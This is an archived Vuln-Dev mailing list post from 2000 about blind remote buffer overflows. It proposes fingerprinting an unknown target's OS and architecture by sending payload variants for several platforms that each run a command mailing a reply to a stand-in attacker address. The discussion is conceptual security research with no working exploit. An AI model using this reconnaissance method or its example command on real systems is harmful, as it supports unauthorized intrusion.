Vulnerability Development mailing list archives
Re: Blind Remote Buffer Overflow
From: 11a () GMX NET (Bluefish)
Date: Tue, 2 May 2000 03:42:19 +0200
Uhm... To begin with, in most situations it seems unrecommended to assume the attacker is blind. But if he really is? Some people have mentioned some ways to try to find a vulnerability remotely. Now, lets say you using some way have determined you can rewrite EIP, PC (or whatever it's called on your architecture). What now to do to detect operating system and architecture? I believe a 'generic buffert overflower' could be a part of answer. Let a tool be given what you know (or guess) about the overflow. Let it generate a number of variants (as an example: Linux/i386, Linux/sparc, Windows/i386) which all of them does something like "echo 3 | mail badguy () test com". Depending upon what mail you actually get back, you know that the architecture is at least quite compatible with the envioronents that returns an answer. It does seem like quite some work, but it does (IMHO) show that a even if a system has secret sourcecode and secret binaries as well, it's not possible to provide security through obscurity. If such scans could be automated, it would rise a need even for programs which only exists on a single system to be coded quite well. The group/company at www.eeye.com has a tool which can be used to scan for unknown exploits if you give it some information to it about "where you want to go today" (grin). I don't know how good it is, but perhaps the support of 'blind overlows' to detect systems can be incorperated into their scanner. ..:::::::::::::::::::::::::::::::::::::::::::::::::.. http://www.11a.nu || http://bluefish.11a.nu eleventh alliance development & security team
Current thread:
- Re: Blind Remote Buffer Overflow Ex Machina (Apr 30)
- <Possible follow-ups>
- Re: Blind Remote Buffer Overflow Matthew R. Potter (Apr 30)
- Re: Blind Remote Buffer Overflow Arturo Busleiman (Apr 30)
- Re: Blind Remote Buffer Overflow Ralph The Wonder Llama (May 01)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Reinier Heeres (May 02)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (May 02)
- Re: Blind Remote Buffer Overflow Jani Ollikainen (May 02)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Bluefish (May 01)
- Re: Blind Remote Buffer Overflow Marc (May 01)
- Re: Blind Remote Buffer Overflow Blue Boar (May 01)
- Re: Blind Remote Buffer Overflow matej (May 01)
- Re: Blind Remote Buffer Overflow Pavol Luptak (May 02)
- Ascii-x86 was: Blind Remote Buffer Overflow Bluefish (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Robert Collins (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Bill Weiss (May 03)
- firewall audit LEOW Chiun-Yi Jonathan (May 03)
- Re: firewall audit Ron DuFresne (May 03)
- Re: firewall audit antirez (May 04)